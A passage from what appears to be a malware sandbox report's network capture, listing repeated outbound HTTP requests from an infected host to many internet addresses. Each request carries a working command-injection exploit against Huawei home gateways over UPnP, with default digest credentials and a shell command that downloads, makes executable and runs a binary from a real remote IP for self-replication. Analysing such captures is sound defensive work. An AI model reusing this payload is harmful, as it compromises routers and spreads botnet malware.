                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1906192.168.2.235825052.48.216.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559808016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1907192.168.2.234464841.221.1.20437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559850931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1908192.168.2.2358890197.52.115.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.559854031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1909192.168.2.2356866197.48.193.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560394049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1910192.168.2.234436441.137.53.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560461044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1911192.168.2.234911441.115.86.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560461998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1912192.168.2.2337242197.153.145.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560514927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1913192.168.2.235815454.101.211.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560514927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1914192.168.2.234590299.61.189.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560530901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1915192.168.2.235656270.194.247.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560576916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1916192.168.2.235581241.82.117.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560591936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
